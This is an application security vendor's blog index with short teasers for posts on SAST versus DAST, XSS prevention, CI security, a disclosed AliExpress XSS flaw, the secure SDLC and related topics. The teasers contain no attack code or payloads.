Company Blog

Start A FREE Trial
« Back to Resources

SAST vs DAST – Why SAST?

SAST vs DASTApplication security used to be an afterthought until a few years ago, but the exponential rise in cybercrime and malicious activity has made organizations pay more attention to this crucial aspect. This realization has also brought up a widespread discussion about the pros and cons of the various AppSec solutions that are on offer today.

While Penetration (Pen) Testing, Interactive Application Security Testing (IAST) and Web Application Firewalls (WAF) are widely recognized security methodologies, they are typically used as processes to compliment the two most popular solutions in use today – Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST).

SAST vs DAST will be discussed around 5 parameters in this article:

  • Software Development Life Cycle (SDLC) Integration.
  • Continuous Integration Continuous Deployment (CICD) Implementation.
  • Vulnerability Coverage and Effectiveness.
  • Mitigation/Remediation Performance.
  • Return of Investment (ROI).

Is SAST (White Box testing) truly effective in detecting today’s commonly found application-layer vulnerabilities? Or is DAST (Black Box testing) the better option for organizations? SAST vs DAST

(more…)

Tags: , , , , , , , , , , , , , , ,

15 Vulnerable Sites To (Legally) Practice Your Hacking Skills

They say the best defense is a good offense – and it’s no different in the InfoSec world. Use these 15 deliberately vulnerable sites to practice your hacking skills so you can be the best defender you can – whether you’re a developer, security manager, auditor or pen-tester. Always remember: Practice makes perfect! What other sites have you used to practice on? Let us know below!

(more…)

Tags: , , , , ,

XSS: The Definitive Guide to Cross-Site Scripting Prevention

The Definitive Guide To (1)As old as web browsers themselves, cross-site scripting (XSS) has been an ongoing issue in the security world. It’s consistent appearance on the OWASP Top 10 and in news reports of cross-site scripting attacks has kept the security issue in the spotlight over the years. Yet after two decades the security issue remains one of the most common attacks on web applications, with consistent reports of over 70% of sites at risk.

So, what is Cross-Site Scripting and how do we change our habits as users, developers and security professionals so we can prevent attacks once and for all? 

(more…)

Tags: , , , ,

All You Wanted To Know About Continuous Integration Security

Continuous Integration SecurityContinuous Integration (CI) is an application development practice that’s becoming more and more popular in large software development organizations. While it boosts productivity and code integrity, it introduces new technical challenges in the security process, magnifying the importance of selecting of the right solution for the task.

Despite CI’s introduction in 2001, IT organizations and companies continued to opt for the conventional sequential development. This also involved the traditional security solutions that were largely implemented towards the end of the production process and at times even after the application was released to the market. This led to spikes in maintenance costs and resource requirements.

But times are changing. The Actuation Consulting research shows that 74% of organizations were using the Continuous Integration and Continuous Delivery (CICD) / Agile methodology in 2013. This trend is continuing to gain steam even today thanks to the numerous productivity benefits, but Continuous Integration security can be challenging due to the various limitations of the traditional solutions.

(more…)

Tags: , , , , , , , , , ,

CISO Insights: How the CISO of San Diego Secures His City

Interview with a CISOThis article is the first in a series of interviews with CISOs in various industries. Our goal is to share our conversations with different Chief Information Security Officers about how they deal with daily tasks as well as the bigger picture of innovating security practices around business operations.

Gary Hayslip is currently the Deputy Director and Chief Information Security Officer for the city of San Diego, a role he’s held for the past two years. Previous to that, Gary spent over 25 years as a Information Security professional in the US Navy Command, working his way up to becoming CISO.

We had the opportunity to interview Gary about the risks and rewards of securing a major city, as well as what he’s learned over his many years in the industry and shared the highlights below. You can also grab the full interview here and be sure to follow Gary on Twitter!

(more…)

Tags: , , , , ,

The AliExpress XSS Hacking Explained

LogoAs you may have heard it was recently advertised that AliExpress, one of the world’s largest online shopping websites, was found to have substantial security shortcomings. As one of the people who discovered the Cross-Site Scripting (XSS) vulnerability, I would like to discuss and elaborate on it in the following post.

A few months ago, I purchased some items from AliExpress. After the purchase, I sent a message to the seller in order to ask him a question regarding the items. From my experience as an application security expert at AppSec Labs, I had suspected that it might be vulnerable to a certain security breach, and so I started to investigate the issue locally without harming the system or its users.

After a short investigation, I had concluded that any buyer in the website can browse to any item and can send a message to the seller using the vulnerable “Contact Now” feature. This feature can be abused by any registered buyer who could send a message to the seller containing a malicious payload.

(more…)

Tags: , , , , , ,

AppSec 101: The Secure Software Development Life Cycle

Secure Software Development Life CycleDue to the growing demand for robust applications, the secure Software Development Life Cycle methodology is gaining momentum all over the world. Its effectiveness in combating vulnerabilities has made it mandatory in many organizations. The objective of this article is to introduce the user to the basics of the secure Software Development Life Cycle (also known as sSDLC).

Before we cover the various steps of development in the Secure Software Development Life Cycle, it’s important to understand why a SDLC is needed in the first place. I will then present an overview of secure Software Development Life Cycle and why it’s becoming so helpful in developing safe web and mobile applications.

This article is written keeping in mind CISOs, project managers, program managers, architects and developers interested in improving the security standards of the applications developed by their organizations. It is intended to be a starter for people who want to integrate security into their existing software development processes. First we’ll understand the various phases of the SDLC. Then we’ll look into the importance of having a secure SDLC.

(more…)

Tags: , , ,

Open Source vs. Commercial Tools: Static Code Analysis Showdown

commercial open source static code analysis toolsIt’s the never-ending dilemma; the ‘Coke or Pepsi’ debate of the software and security world, and there’s still no definitive answer.

As the application security market grows, so too does the variety of tools available to organizations seeking to secure their applications. And with both open source and commercial tools popping up and solid options on either side, the decision isn’t made any easier to the question emerging in organizations around the world: When it comes to selecting tools for source code analysis, should we choose open source or commercial?

A few months ago, we released The Ultimate List of Open Source Static Code Analysis (SCA) Tools and heard that many found it useful when deciding between the options for open source SCA platforms.

Now we’re taking a look at the pros and cons of open source static code analysis tools versus commercial source code analysis tools. Each has its’ own benefits and downsides, but there are worthy tools with both commercial and open source licenses. What it comes down to are the needs of the organization looking to secure the apps they are building and releasing.

(more…)

Tags: , , , , ,

3 Things to Know About Managing Open Source Components in Your App

open sourceManage your software where it’s created. It is in your continuous integration environment where the various pieces of code become software. While some of the software is proprietary, much of it (probably over 50%) is open source components, as your development teams use open source components to boost their productivity and make better products.

You most likely have your proprietary software thoroughly tested, QAed and reviewed via static code analysis on a regular basis. But what about the open source components?  Open source components may have a direct impact on the quality of your software or service.

Open source components may have a direct impact on the quality of your software or service. Security vulnerabilities in open source components are discovered from time to time, and while often fixed very quickly, you need to make sure that you know of them when they are discovered and can apply the right measures when necessary.

(more…)

Tags: , , ,

16 CISOs and Security Leaders You Should be Following on Twitter

CISO and Security Leaders to follow on Twitter

A few months ago we published an article, ’21 AppSec & Security Gurus You Should Be Following on Twitter,’ and even we were surprised with the buzz it created. It seems we had hit a chord with our readers, who are apparently pining for new security people to follow on Twitter. So, to feed your hunger for ‘security twits’, we decided to double down and create a list of the best tweeters of security related news and info by security leaders heading organizations – the CISOs and CSOs.

These security leaders have had years of experience both securing and leading, and have great insights, advice, and news to share with their followers. We’ve even created a handy Twitter list for you to follow and easily keep up with the CISOs recognized here.

What other CISOs and CSOs are great to follow? Leave your suggestions below and we’ll add them to our list on Twitter!

(more…)

Tags: , , , , , , ,